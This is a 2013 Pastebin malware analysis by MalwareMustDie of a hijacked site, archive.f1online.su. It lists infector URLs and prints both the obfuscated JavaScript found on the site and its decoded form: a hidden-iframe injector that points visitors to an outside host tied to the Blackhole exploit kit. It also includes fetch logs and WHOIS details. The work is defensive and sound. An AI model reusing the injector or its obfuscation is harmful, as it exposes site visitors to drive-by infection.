SHARE
TWEET

Huge Redirector ARCHIVE.F1ONLINE.SU leads to BHEK via IFRAME

MalwareMustDie Jan 2nd, 2013 225 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =======================================
  2. MalwareMustDie - Happy New Year Case-2
  3. A huge infector found at the archive.f1online.su server
  4. Using iframe implemented in hijacked service who got suspended..
  5. Leads to the blackhole infector server
  6. ======================================
  7.  
  8. // The domain DNS info:
  9. domain:        F1ONLINE.SU
  10. nserver:       ns1.ns64.com.
  11. nserver:       ns2.ns64.com.
  12. state:         REGISTERED, DELEGATED
  13. person:        Private Person
  14. e-mail:        hanprokiller@yandex.ru
  15. registrar:     RUCENTER-REG-FID
  16. created:       2010.03.16
  17. paid-till:     2013.03.16
  18. free-date:     2013.04.18
  19. source:        TCI
  20. Last updated on 2013.01.02 15:51:35 MSK
  21.  
  22. // infector list, source: spam...
  23. h00p://archive.f1online.su/index.php?s=d5a3b3c8f8855b90b67579b9fd39bbe2
  24. h00p://archive.f1online.su/index.php?s=da72acb03a8c6a6460f8aa387625a37d
  25. h00p://archive.f1online.su/index.php?s=131cfaa384f22f721bb81ad0275dfd3f
  26. h00p://archive.f1online.su/index.php?s=8ce2104fd43bc6c8af664d757e01acec
  27. h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
  28. h00p://archive.f1online.su/index.php?s=b23146819cecca9e3de98e23800bff3d
  29. h00p://archive.f1online.su/index.php?s=b49cf7d91b07bb39216f946b623d0e54
  30. h00p://archive.f1online.su/index.php?s=c2b1aaa4827966f2018fd671af059f0d
  31. h00p://archive.f1online.su/index.php?s=399a97a8f5feef4e422e71100d65b04e
  32. h00p://archive.f1online.su/index.php?s=58cf2c05d3083c4c4eda5f4ab5ceceee
  33. h00p://archive.f1online.su/index.php?s=6292625e82405d536331dd9c9ab8ffe6
  34. h00p://archive.f1online.su/index.php?s=3129b4644c29651880aa5503d2aea421
  35. h00p://archive.f1online.su/index.php?s=04353b7557a3ec62bbcd8eff0da7d0db
  36. h00p://archive.f1online.su/index.php?s=0d754c23fdd68d34d3b13ba2f6aa1bd2
  37. h00p://archive.f1online.su/index.php?s=0e52ee1ca43b6c43f64ca5f88eed5b0e
  38. h00p://archive.f1online.su/index.php?s=138b24f83fa0ea20b4c5b9a727ea171b
  39. h00p://archive.f1online.su/index.php?s=18e2c8e11af7af1405dfcdb1d193ea26
  40. h00p://archive.f1online.su/index.php?s=1b224d7e67f58d246d75898fe83ee58b
  41. h00p://archive.f1online.su/index.php?s=1d5b20045845fcc58dc82a4889938367
  42. h00p://archive.f1online.su/index.php?s=22ccde98b2c7c45f851512f4bbf6efc6
  43. h00p://archive.f1online.su/index.php?s=2323d0f652bb265f425d6c79fd539d89
  44. h00p://archive.f1online.su/index.php?s=295c3ddf5502be60a6ddab3f7927c0fc
  45. h00p://archive.f1online.su/index.php?s=2b3ec7e463b0454ec505b5e229037d6b
  46. h00p://archive.f1online.su/index.php?s=2dabc115cfb693551cd71b5e8b41d579
  47. h00p://archive.f1online.su/index.php?s=362dbf94cd641e8dca4aa07cbc116732
  48. h00p://archive.f1online.su/index.php?s=409142b821fb10c20112aeb78ed7e06d
  49. h00p://archive.f1online.su/index.php?s=410a91e7daddbf1e2dc8449a25a45db4
  50. h00p://archive.f1online.su/index.php?s=46dcfe76e53f74f558c722573cb906ed
  51. h00p://archive.f1online.su/index.php?s=52244e06882800db3145a6a18c3113c1
  52. h00p://archive.f1online.su/index.php?s=53313082818c54d9d855ce4c93426fe8
  53. h00p://archive.f1online.su/index.php?s=6135fbb39b9ca6efa376047868ffb43c
  54. h00p://archive.f1online.su/index.php?s=6183bef649a5fbc1cbd29eff88f92f4b
  55. h00p://archive.f1online.su/index.php?s=7ce20d2ee2f97d032467a2c59efb1dca
  56. h00p://archive.f1online.su/index.php?s=88766cda76176567b6db0c65a6cf3e4c
  57. h00p://archive.f1online.su/index.php?s=8c2136f1fdf675602f5d028dfd959229
  58. h00p://archive.f1online.su/index.php?s=8c73e620862e1035bd1e6c2fc6e54e30
  59. h00p://archive.f1online.su/index.php?s=8ce2104fd43bc6c8af664d757e01acec
  60. h00p://archive.f1online.su/index.php?s=94884ac430d59aa095bba6005bed0799
  61. h00p://archive.f1online.su/index.php?s=a52ab4a411f20cb7e2169dc5792e74c1
  62. h00p://archive.f1online.su/index.php?s=a8751598404f32180a032f80c587e90f
  63. h00p://archive.f1online.su/index.php?s=a92f3e65fde506cba2940d98549dbee7
  64. h00p://archive.f1online.su/index.php?s=ab433f610314fc8cbdb7165c38d8ec8a
  65. h00p://archive.f1online.su/index.php?s=abe7af0160a74edaea0e2e1a4c8ddc0f
  66. h00p://archive.f1online.su/index.php?s=b49cf7d91b07bb39216f946b623d0e54
  67. h00p://archive.f1online.su/index.php?s=b991b55d9c1ce024cd71ac3625be9283
  68. h00p://archive.f1online.su/index.php?s=c834c0bd26611e2f2a61e33a6da19301
  69. h00p://archive.f1online.su/index.php?s=ce165aa157e99f9cc5451ae064939db8
  70. h00p://archive.f1online.su/index.php?s=d009d525c8b0745eb00c4afcaaaf53a8
  71. h00p://archive.f1online.su/index.php?s=d4e55883d699a609afa8354654650d55
  72. h00p://archive.f1online.su/index.php?s=da72acb03a8c6a6460f8aa387625a37d
  73. h00p://archive.f1online.su/index.php?s=e1e7ea97d1f6c0a1c4e0b8458306e20d
  74. h00p://archive.f1online.su/index.php?s=e54c28ef1f9ca3e043c8674c5fb4382e
  75. h00p://archive.f1online.su/index.php?s=ed006750e61bbdb5be3c651cb6834c09
  76. h00p://archive.f1online.su/index.php?s=1709a21b05e36cd940a007aa0e33bb53
  77. h00p://archive.f1online.su/index.php?s=21f3aad0bc10971fe5e25c5144cb50e2
  78. h00p://archive.f1online.su/index.php?s=2217f2ea0fbdef8a1c26918296fc2de1
  79. h00p://archive.f1online.su/index.php?s=2f74ed02afceb0ffd6893d8e98f992f4
  80. h00p://archive.f1online.su/index.php?s=31c8a52821aede0a7589d1e5b4f072ea
  81. h00p://archive.f1online.su/index.php?s=34dfef85a9214579853c522fc34df05f
  82. h00p://archive.f1online.su/index.php?s=42ae9d94d436b57e0b5ac7786b329ea4
  83. h00p://archive.f1online.su/index.php?s=5df8da2fd399506615b03b00dbc4d6ed
  84. h00p://archive.f1online.su/index.php?s=78d22f89a3b4311f429e024496f383fd
  85. h00p://archive.f1online.su/index.php?s=81b8c150c9621b0c3b6f799487a1e534
  86. h00p://archive.f1online.su/index.php?s=925c42788949cf79265b3554409904ec
  87. h00p://archive.f1online.su/index.php?s=96d8d02500faaaafa65f4268de99d1c9
  88. h00p://archive.f1online.su/index.php?s=a99c41940cbde8a22872661205ea6716
  89. h00p://archive.f1online.su/index.php?s=bb718fc38888e178bffb48ca410fe912
  90. h00p://archive.f1online.su/index.php?s=bcdc3bfaac90e73ff31a4779fc9ec2ba
  91. h00p://archive.f1online.su/index.php?s=c456725580677878a0a664a4f1d34b73
  92. h00p://archive.f1online.su/index.php?s=d5feb51da3003662795e6da6964ff696
  93. h00p://archive.f1online.su/index.php?s=d7be50e99af481fadcb953b45781cde8
  94. h00p://archive.f1online.su/index.php?s=dba21cd8417246e4e6bce2b1808a5902
  95. h00p://archive.f1online.su/index.php?s=e500ac9e7a61015d62952742cf5fbcb4
  96. h00p://archive.f1online.su/index.php?s=1709a21b05e36cd940a007aa0e33bb53
  97. h00p://archive.f1online.su/index.php?s=21f3aad0bc10971fe5e25c5144cb50e2
  98. h00p://archive.f1online.su/index.php?s=2217f2ea0fbdef8a1c26918296fc2de1
  99. h00p://archive.f1online.su/index.php?s=2a9b6bfd6a58bc56f90b52e2cbab9b10
  100. h00p://archive.f1online.su/index.php?s=2f74ed02afceb0ffd6893d8e98f992f4
  101. h00p://archive.f1online.su/index.php?s=31c8a52821aede0a7589d1e5b4f072ea
  102. h00p://archive.f1online.su/index.php?s=34dfef85a9214579853c522fc34df05f
  103. h00p://archive.f1online.su/index.php?s=42ae9d94d436b57e0b5ac7786b329ea4
  104. h00p://archive.f1online.su/index.php?s=5df8da2fd399506615b03b00dbc4d6ed
  105. h00p://archive.f1online.su/index.php?s=78d22f89a3b4311f429e024496f383fd
  106. h00p://archive.f1online.su/index.php?s=81b8c150c9621b0c3b6f799487a1e534
  107. h00p://archive.f1online.su/index.php?s=925c42788949cf79265b3554409904ec
  108. h00p://archive.f1online.su/index.php?s=96d8d02500faaaafa65f4268de99d1c9
  109. h00p://archive.f1online.su/index.php?s=a99c41940cbde8a22872661205ea6716
  110. h00p://archive.f1online.su/index.php?s=bb718fc38888e178bffb48ca410fe912
  111. h00p://archive.f1online.su/index.php?s=bcdc3bfaac90e73ff31a4779fc9ec2ba
  112. h00p://archive.f1online.su/index.php?s=c456725580677878a0a664a4f1d34b73
  113. h00p://archive.f1online.su/index.php?s=d5feb51da3003662795e6da6964ff696
  114. h00p://archive.f1online.su/index.php?s=d7be50e99af481fadcb953b45781cde8
  115. h00p://archive.f1online.su/index.php?s=dba21cd8417246e4e6bce2b1808a5902
  116. h00p://archive.f1online.su/index.php?s=e500ac9e7a61015d62952742cf5fbcb4
  117. h00p://archive.f1online.su/index.php?s=f97d42aaa451af836c19d76fad120eb0
  118. h00p://archive.f1online.su/index.php?s=fe21750911f7513e0d6c159fe0334cfa
  119. h00p://archive.f1online.su/index.php?s=1823d888ab6adb9b61ff81d52ef8572c
  120. h00p://archive.f1online.su/index.php?s=373f5fde8c2d77ee35b1056945051af2
  121. h00p://archive.f1online.su/index.php?s=45f2062512ebe2aa74a54bb656041806
  122. h00p://archive.f1online.su/index.php?s=4a6ed6125fa620d2192c1dc78a1d6007
  123. h00p://archive.f1online.su/index.php?s=564f2cd579c8d75bf74ca60d360a9357
  124. h00p://archive.f1online.su/index.php?s=5e1afbfbc5e0bd039d394f5c197a4a59
  125. h00p://archive.f1online.su/index.php?s=6292625e82405d536331dd9c9ab8ffe6
  126. h00p://archive.f1online.su/index.php?s=6ae9c8cefdb2ef6cc435e335aca7db5f
  127. h00p://archive.f1online.su/index.php?s=7418f0876833c29b0a793464deabd19d
  128. h00p://archive.f1online.su/index.php?s=74bb294b933b1c71650e012f084a2187
  129. h00p://archive.f1online.su/index.php?s=7bd14c51e9eddb6ba8f9c728b581e93c
  130. h00p://archive.f1online.su/index.php?s=8ffba83945d3345010238f4d6d3179e0
  131. h00p://archive.f1online.su/index.php?s=9c770b3aec149213e853480db1c8c4cc
  132. h00p://archive.f1online.su/index.php?s=9e193b240898b13eda34c2e67f2655c2
  133. h00p://archive.f1online.su/index.php?s=a4635ecddac17a08e37dc6483730724f
  134. h00p://archive.f1online.su/index.php?s=b1b2abc2cb79a904aab5111399db9e10
  135. h00p://archive.f1online.su/index.php?s=c9ec224350860bee1f77ddc659525aab
  136. h00p://archive.f1online.su/index.php?s=d5a3b3c8f8855b90b67579b9fd39bbe2
  137. h00p://archive.f1online.su/index.php?s=e06e6ca5cf9052486ea7becf9c2868b0
  138. h00p://archive.f1online.su/index.php?s=ecc767d669cc03e39e9315eb8014f4bf
  139. h00p://archive.f1online.su/index.php?s=ed4d50f514c040549f86c1d3fab92f5f
  140. h00p://archive.f1online.su/index.php?s=f7eefb7ed4afb524245b22c07c0f97d9
  141. h00p://archive.f1online.su/index.php?s=f995c7f60df4ace131e3c6764570de34
  142. h00p://archive.f1online.su/index.php?s=277423d9d0fe29ea8b2639f3ecf2080b
  143. h00p://archive.f1online.su/index.php?s=3129b4644c29651880aa5503d2aea421
  144. h00p://archive.f1online.su/index.php?s=3b4a1c163e2056f1616fdfd7fcda5ad5
  145. h00p://archive.f1online.su/index.php?s=3d821d68f2391f37ab999e89f726d3ee
  146. h00p://archive.f1online.su/index.php?s=3f5cc53130ccea57b3edf7583e0083c0
  147. h00p://archive.f1online.su/index.php?s=4c02d30f9ba815e1bdbfb0df48182d6e
  148. h00p://archive.f1online.su/index.php?s=4c12fca580d5d29682a4cede53639412
  149. h00p://archive.f1online.su/index.php?s=58cf2c05d3083c4c4eda5f4ab5ceceee
  150. h00p://archive.f1online.su/index.php?s=66081323c1300b0259830104492d55fc
  151. h00p://archive.f1online.su/index.php?s=69457be192d8c4a7ac5409325c1bd56d
  152. h00p://archive.f1online.su/index.php?s=6ac8de47a32570076b3ed1ec44e48f8e
  153. h00p://archive.f1online.su/index.php?s=927654c85f02973db103bd7a4c2333c2
  154. h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
  155. h00p://archive.f1online.su/index.php?s=9e63e10da1f858a3b5df6aa29a04d3ea
  156. h00p://archive.f1online.su/index.php?s=b43a4854f72c6bc22e99f40ad41a651d
  157. h00p://archive.f1online.su/index.php?s=cd131ff66cb6d433068034ed5df482b0
  158. h00p://archive.f1online.su/index.php?s=d8a330901eb0e904bbca55d4175c756e
  159. h00p://archive.f1online.su/index.php?s=e58d852590314914b7e6c163be5a7df5
  160. h00p://archive.f1online.su/index.php?s=ecd86011d3a1ba7c3ce17bf7e62cffa8
  161. h00p://archive.f1online.su/index.php?s=f7fabe7999cea5f9af1b286dbc8c35a1
  162. h00p://archive.f1online.su/index.php?s=fceb561215897110117a9cc5c9898a6d
  163. h00p://archive.f1online.su/index.php?s=0637be835a981ffe1c1ffb5dc7904677
  164. h00p://archive.f1online.su/index.php?s=07a0e25ea57461f8f53ea4db15ee2f73
  165. h00p://archive.f1online.su/index.php?s=0904a4c5c25ca1bff1d647f2be791592
  166. h00p://archive.f1online.su/index.php?s=16f856380e2d686bfffbd2220de991a0
  167. h00p://archive.f1online.su/index.php?s=0c516b4fce7c2120fcf24baaf2a9659f
  168. h00p://archive.f1online.su/index.php?s=0d7f334fa963f307598547dec9bccbaa
  169. h00p://archive.f1online.su/index.php?s=131cfaa384f22f721bb81ad0275dfd3f
  170. h00p://archive.f1online.su/index.php?s=1a4ad9c330f5272644960bcb83aa0775
  171. h00p://archive.f1online.su/index.php?s=1af03118b5091aaf95e009fe7908100c
  172. h00p://archive.f1online.su/index.php?s=1b4bb0dfb0e46e2a126cd1fc2b7a69eb
  173.  
  174. // server dns info:
  175. archive.f1online.su.    3600    IN      A       194.28.132.130
  176. archive.f1online.su
  177.         origin = ns1.ns64.com
  178.         mail addr = webmaster.archive.f1online.su
  179.         serial = 1
  180.         refresh = 10800
  181.         retry = 3600
  182.         expire = 604800
  183.         minimum = 3600
  184.  
  185.  
  186. //Let's check why it got infected, with what?
  187. // took some sample, leads to the same redirection...
  188. // PoC:
  189.  
  190. h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
  191.  
  192. // finding out the reason why....grab it..
  193.  
  194. --20:03:25--  h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
  195.            => `index.php@s=96f14a35edf55e062c1a613186b6a8e8'
  196. Resolving archive.f1online.su... seconds 0.00, 194.28.132.130
  197. Caching archive.f1online.su => 194.28.132.130
  198. Connecting to archive.f1online.su|194.28.132.130|:80... seconds 0.00, connected.
  199. GET /index.php?s=96f14a35edf55e062c1a613186b6a8e8 HTTP/1.0
  200. User-Agent: #MalwareMustDie - Wishing you a terrible 2013 year!
  201. Accept: */*
  202. Host: archive.f1online.su
  203. Connection: Keep-Alive
  204. HTTP request sent, awaiting response...
  205. HTTP/1.1 200 OK
  206. Server: nginx
  207. Date: Wed, 02 Jan 2013 11:03:21 GMT
  208. Content-Type: text/html; charset=utf-8
  209. Connection: close
  210. X-Powered-By: PHP/5.2.14
  211. Set-Cookie: session_id=baf0913e29b2023470b4ed83bf5f1f9f; path=/; httponly
  212. Content-Language: ru
  213. 200 OK
  214. Length: unspecified [text/html]
  215. 20:03:30 (92.29 KB/s) - `index.php@s=96f14a35edf55e062c1a613186b6a8e8' saved [261760]
  216.  
  217.  
  218. // found this obfuscation code, the question is "is it malicious??" We'll see.
  219.  
  220. try{window.document.body=window.document.body}catch(dgsgsdg){zxc=1;}try{if(window.document)window["doc"+"ument"]["body"]=window.document}catch(bawetawe)
  221. {if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber)
  222. {if("".substr)ev=eval;}}
  223. n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39",
  224. "3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e",
  225. "1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g",
  226. "41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m",
  227. "4f","4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24",
  228. "1d","42","4e","3m","49","41","4f","2b","23","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e",
  229. "1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c",
  230. "4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29",
  231. "1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45",
  232. "42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o",
  233. "4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g",
  234. "4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m","4f",
  235. "4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24","1d",
  236. "42","4e","3m","49","41","4f","2b","23","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b",
  237. "1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f",
  238. "4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48",
  239. "41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g",
  240. "44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44",
  241. "4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a",
  242. "4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h",
  243. "44","45","48","40","1f","42","1g","29","d","9","9","50"];
  244. h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(window.document)ev(""+z)}}}
  245.  
  246.  
  247. // Shortly, de-obfuscation result:
  248.  
  249. if (document.getElementsByTagName('body')[0]){
  250.   iframer();
  251. }
  252. else {
  253.   document.write("
  254. <iframe src='http://inmediasys.com/feed/frames.php?uid=56&frames=5' width='10' height='10'
  255.  style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  256. }
  257. function iframer(){
  258.   var f = document.createElement('iframe');
  259.   f.setAttribute('src', 'http://inmediasys.com/feed/frames.php?uid=56&frames=5');
  260.   f.style.visibility = 'hidden';
  261.   f.style.position = 'absolute';
  262.   f.style.left = '0';
  263.   f.style.top = '0';
  264.   f.setAttribute('width', '10');
  265.   f.setAttribute('height', '10');
  266.   document.getElementsByTagName('body')[0].appendChild(f);
  267. }
  268.  
  269. // try to fetch this....
  270.  
  271. --20:08:48--  http://inmediasys.com/feed/frames.php?uid=56&frames=5
  272.            => `frames.php@uid=56&frames=5'
  273. Resolving inmediasys.com... seconds 0.00, failed: Unknown host.
  274.  
  275. // seek further....
  276.  
  277. Domain Name: INMEDIASYS.COM
  278.  
  279.  Registrant:
  280.      N/A
  281.     Joanie Kenny        (joanie_kenny601@startrekmail.com)
  282.     Clara Van St
  283.     Austin
  284.     TX,78734
  285.     US
  286.     Tel. +1.0898265608
  287.  
  288.  Creation Date: 20-Nov-2012
  289.  Expiration Date: 20-Nov-2013
  290.  
  291.  Domain servers in listed order:
  292.      ns1.suspended-domain.com
  293.      ns2.suspended-domain.com
  294.  
  295.  
  296. // domain down, looks suspended...Question is still un0-answered, WHY?
  297. //
  298. // evidence are the below url:
  299. // http://inmediasys.com/feed/frames.php?uid=56&frames=5
  300.  
  301.  
  302. // let's make sure.. check every DB for similar pattern URL...
  303. // found in :
  304. // Urlquery:
  305. //  http://193.107.85.36/report.php?id=209160
  306. //    we found similar url
  307. // http://inmediasys.com/feed/xml.php?98679407&uid=56
  308.  
  309.  
  310. //It has the recorded http server header sent comm;
  311.  
  312. GET /feed/xml.php?98679407&amp;uid=56 HTTP/1.1
  313. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
  314. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  315. Accept-Language: en-us,en;q=0.5
  316. Accept-Encoding: gzip,deflate
  317. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  318. Keep-Alive: 115
  319. Connection: keep-alive
  320. Referer: http://inmediasys.com/feed/frames.php?uid=56&amp;frames=5
  321.  
  322. // replied below:
  323.  
  324. HTTP/1.1 200 OK
  325. Content-Type: text/html; charset=utf-8
  326. Server: nginx
  327. Date: Thu, 22 Nov 2012 16:39:35 GMT
  328. Transfer-Encoding: chunked
  329. Connection: keep-alive
  330. X-Powered-By: PHP/5.3.16-1~dotdeb.0
  331. Cache-Control: no-store, no-cache, must-revalidate
  332. Content-Encoding: gzip
  333.  
  334. // ↑It's a blackhole implemented infector
  335.  
  336. // Now we know why it is evil,
  337. // IFRAME used in the evil way,
  338. // Good thing is domains blocked except the infector used.
  339. // Someone must inform the cleanup to f1online.su
  340.  
  341. ----
  342. #MalwareMustDie
  343. [0x00000000]> !date
  344. Wed Jan  2 20:48:05 JST 2013
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top